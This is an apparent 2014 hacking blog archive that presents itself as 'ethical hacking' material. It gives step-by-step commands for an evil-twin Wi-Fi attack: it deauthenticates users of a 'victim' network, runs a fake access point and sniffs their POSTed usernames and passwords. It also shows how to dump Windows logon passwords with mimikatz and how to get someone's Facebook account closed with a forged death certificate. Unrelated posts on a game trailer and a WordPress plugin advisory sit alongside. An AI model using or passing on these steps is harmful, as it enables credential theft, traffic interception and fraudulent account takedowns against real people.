Sunday, June 22, 2014 5:23 PM

A Beginners Guide to Ethical Hacking - E-BOOK

A Beginners Guide to Ethical Hacking is a complete path for newbie hackers who want are curious to Learn Ethical Hacking Techniques.The Information given in this book will make you a master hacker.

How will the information in the book affect me?

  • You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation
  • You will start to think like hackers
  • Secure your computer from trojans,worms, Adwares etc
  • Amaze your friends with your newly learned tricks
  • You will be able to protect your self from future hack attacks
 Download it for free


Wifi Packet Capturing and Session Hijacking using Wireshark 2

Before you go to this section it is required you to read first tutorial
Wifi Packet Capturing and Session Hijacking using Wireshark 1

Step - 7 

Now Setting up New configurations by typing these commands. 
“ifconfig eth0 0.0.0.0 up”  
“ifconfig at0 0.0.0.0 up” 
   
Description -  
ifconfig stands for interface configurator. ifconfig command is used to configure network interfaces. ifconfig is widely used to initialize the network interface and to enable or disable the interfaces.  

Step -8

Now it’s turn on MITM Interface by typing this command 
“ifconfig mitm up”  

Description –  
ifconfig stands for interface configurator. ifconfig command is used to configure network interfaces. ifconfig is widely used to initialize the network interface and to enable or disable the interfaces. 
By Default Interface we created is down, we need to put it up.

Step – 9 

Now send the deauthentication packets to the router by typing this command
“aireplay-ng - - deauth 0 - a 94:44:52:DA:B4:28 mon0”   

Description –  
Aireplay-ng is used to inject frames.  
The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, Interactive packet replay, hand- crafted ARP request injection and ARP-request reinjection. 
We use 0 for continuous Flooding of packets. We use 1 for Single Flooding of packet. 
-a represent bssid of the victim network. 94:44:52:DA:B4:28 here is a bssid of the victim network.

Step - 10

Now it’s time to assigning the IP to all victims by typing this command
“dhclient3 mitm&”   OR  “dhclient3 mitm &”  

Description –  
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of numbers (i.e., a scope) configured for a given network. 

Step – 11 

Now you can check the client connected on the 5th Terminal where you create Fake Access point.

Step – 12 

Start your Wireshark Packet Analyzer Tool by typing this command 
“wireshark&”   OR   “wireshark &  

Description –   
 Wireshark is an open source tool for profiling network traffic and analyzing packets. Such a tool is often referred to as a network analyzer, network protocol analyzer or sniffer.

Step – 13 

Now Select the Interface (at0) and click on START

Type “http contains POST” and you can see that all packets be in your sniffing tool


and you'll get user name and password :)
Happy hacking


Wifi Packet Capturing and Session Hijacking using Wireshark 1



The main Objective of this Attack is to make a Fake Access point and send the fake ARP Packets on same Wi-Fi Network from where the users are connected and the name of fake access point is same as the name of the wireless network reside there. So when a fake access point is created with same wireless network name then the user which is connected to original network gets disconnected and connects with your fake access point, so all the traffic tunnels throughout my system and we get all details/credentials/information of that user which is generally known as session hijacking.

 

Requirements

1. Backtrack Operating System (BT5)
2. Virtual Machine (With USB Adapter)
3. Internet Access on your System 

Step 1

Open Backtrack Operating System and start Terminal and type “iwconfig” for checking wireless interface.

Description – 
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency).

Step - 2

Start this Wireless Interface by typing this command 
“airmon-ng start wlan0”.
 
Description – 
This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status. 
wlan0 is your wifi card.  wlan is wireless lan and 0 is the number of your card.

Step - 3

Start your monitor mode by typing this command “airodump-ng mon0”. It captures data from all stations. 

Description -    
Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEP IVs (Initialization Vector) for the intent of using them with aircrack-ng. Also airodump-ng is capable of logging the coordinates of the found access points. 
mon0 is the same card (wlan0) in monitor mode.  Once you put wlan0 in monitor mode it will be read as mon0 and wlan0

Step - 4

Set up the channel ID which is shown above in airodump-ng command by typing these commands   “iwconfig mon0 channel 5”      “iwconfig wlan0 channel 5
                                               OR 
iwconfig wlan0 channel 5”     “iwconfig mon0 channel 5”  

Decription -  
iwconfig is similar to ifconfig, but is dedicated to the wireless interfaces. It is used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency).
wlan0 is your wifi card.  wlan is wireless lan and 0 is the number of your card. 
mon0 is the same card (wlan0) in monitor mode.  Once you put wlan0 in monitor mode it will be read as mon0 and wlan0. 
The ”–channel” (-c) option allows a single or specific channels to be selected.

Step -5

Now Setup your Fake Router by typing this command 
“airbase-ng - e “belkin.3448” mon0” 
Description – 
Airbase-ng is multi-purpose tool aimed at attacking clients as opposed to the Access Point (AP) itself. The main idea is of the implementation is that it should encourage clients to associate with the fake AP, not prevent them from accessing the real AP.
”– essid” (-e) of the Network.

Step - 6 

Now it’s time to bridge all networks by typing these commands   
“brctl addbr mitm”  
“brctl addif mitm eth0” 
 “brctl addif mitm at0”
Here – mitm is <interface name>
Description - 
Brctl - is used to create a bridge between two interfaces. 
Addbr - A bridge can be added using the following command, with <name> being replaced with the name of the bridge being replaced. 
Addif - To add a interface to a bridge, Where <brname> is the existing bridge name, and ifname is the interface you want to add.

Wednesday, June 11, 2014 7:39 AM

Far Cry 4 World Gameplay (Nepal) Premiere- Walkthrough E3 2014











Watch the first Far Cry 4 game play footage, introducing the #1 most requested feature among fans: open-world co-op with a friend!


Included Environment Concept of Nepal and Bhutan

About Far Cry 4
Far Cry 4 delivers a massive new open world for you to explore and survive. Hidden in the towering Himalayas lies Kyrat, a country steeped in tradition and violence. You are Ajay Ghale. Traveling to Kyrat to fulfill your mother's dying wish, you find yourself caught up in a civil war to overthrow the oppressive regime of dictator Pagan Min. Explore and navigate this vast open world, where danger and unpredictability lurk around every corner. Here, every decision counts, and every second is a story

Tuesday, June 10, 2014 12:11 AM

Hack Windows password in notime

So you were looking for Windows 8 password hacking tool. Never found any interesting post; right?

Now here I'm back with 100% working Windows 8 password hacking tutorial

So what are you looking at start downloading tool and proceed step by step

Step 1

Download Tool [click here]
Now Extract downloaded tools where ever you want

Step 2

Open appropriate folder x64 or win32 suitable for your Operating System

Step 3

Run mimikatz as a Administrator
on Firewall notification select "Yes"

Step 4

Now this screen will be displayed


 

Step 5

To Check privilege is given or not enter the code below:-
privilege::debug
You should get result like below image

Step 6

If you get privilege as image above now you are ready to get password
now Enter the command below to get the password
 sekurlsa::logonPasswords full
there is space after passwords 
   
 Hope you've enjoyed this tutorial :) please comment your feedback

Friday, June 6, 2014 4:24 AM

Close Facebook Accounts

What this guide will show you, is how to get any facebook account closed. You will do this by tricking facebook into thinking the person is dead, so they will close the account.

This simple tutorial will help you to close your friends, family or anyone's facebook account if he/she is no more in this world. All the best (y)
 
 
 
 
 
 
  1. Goto
  1. Full Name: Your Victims Full name(Name last name)
    Date of birth: Go at his profile and click at Info tab and get his date of birth.
    Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
    Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
    Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
    Relationship to this person: To make more believable select Immediate Family.
    Requested Action: Remove Profile
    Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a Death Certificate or Certificate of a Death. Open up the image in photoshop and fill in the blanks. Save your image to desktop and upload it in one of the Image
    Free Hosting like: http://imageshack.us
    Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.
  2. Click on Submit and then a message will appear:
    Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the time.
 

Sunday, June 1, 2014 7:48 AM

Vulnerabilities in 'All in One SEO Pack' Wordpress Plugin Put Millions of Sites At Risk

Multiple Serious vulnerabilities have been discovered in the most famous ‘All In One SEO Pack’ plugin for WordPress, that put millions of Wordpress websites at risk.

WordPress is easy to setup and use, that’s why large number of people like it. But if you or your company is using ‘All in One SEO Pack’ Wordpress plugin to optimize the website ranking in search engines, then you should update your SEO plugin immediately to the latest version of All in One SEO Pack 2.1.6.

Today, All in One SEO Pack plugin team has released an emergency security update that patches two critical privilege escalation vulnerabilities and one cross site scripting (XSS) flaw, discovered by security researchers at Sucuri, a web monitoring and malware clean up service.

More than 73 million websites on the Internet run their websites on the WordPress publishing platform and more than 15 million websites are currently using All in One SEO Pack plugin for search engine optimization.

According to Sucuri, the reported privilege escalation vulnerabilities allow an attacker to add and modify the WordPress website’s meta information, that could harm its search engine ranking negatively.

"In the first case, a logged-in user, without possessing any kind of administrative privileges (like an author of subscriber), could add or modify certain parameters used by the plugin. It includes the post’s SEO title, description and keyword meta tags." Sucuri said.
 Also the reported cross-site scripting vulnerability can be exploited by malicious hackers to execute malicious JavaScript code on an administrator’s control panel. "This means that an attacker could potentially inject any JavaScript code and do things like changing the admin’s account password to leaving some backdoor in your website’s files in order to conduct even more “evil” activities later." Sucuri blog post said.

Vulnerability in WordPress plugins is the root cause for the majority of WordPress exploitation and this is one of the main tools in the web hackers' arsenal. The plugin vulnerabilities could be exploited to access sensitive information, deface websites, redirect visitors to any malicious site, or to perform DDoS attacks.

Till now, we haven't seen any web attacks conducted by exploiting these vulnerabilities in the wild, but WordPress website owners are recommended to update their All in One SEO Pack Wordpress plugin to the latest version immediately.

Recent Post

Total Pageviews

Powered by Blogger.

Popular Posts